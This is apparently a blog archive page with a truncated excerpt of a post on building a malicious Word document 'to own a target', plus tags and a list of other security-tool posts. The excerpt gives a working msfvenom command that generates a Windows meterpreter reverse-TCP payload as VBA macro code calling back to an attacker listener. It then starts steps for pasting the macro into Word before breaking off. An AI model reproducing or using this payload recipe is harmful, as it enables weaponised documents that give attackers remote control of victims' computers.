visualbasic
So you want/need a malicious word document in order to own a target, step in metasploit.
The first thing you’ll need to do is create the code that you’ll copy&paste into your word document.
1./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f vba > vbcode.txtThe output will contain 2 blocks of code; the macro and the data.
Open a new word document and Press Alt+F11 in order to open “Microsoft Visual… Continue reading →
Posted in Linux, metasploit, Uncategorized | Tagged metasploit, meterpreter, msfvenom, office, vba, visualbasic, word | Leave a comment
Recent Posts
- Automating an Active Directory Audit in PowerShell
- CherryTree on MacOS (OSX)
- IPv6 LocalLink to IPv4 scanning tool
- NetKit IPv6 Test Lab
- WiPiResponder = Pi Zero W + Responder
- Recovering an activity from a Garmin 920 XT Forerunner
- hashcat on OS X – getting it going!
- PHP NMAP Scan Page
- Hacking the ATN X-sight – part1
- NFSShell on Kali Linux 2.0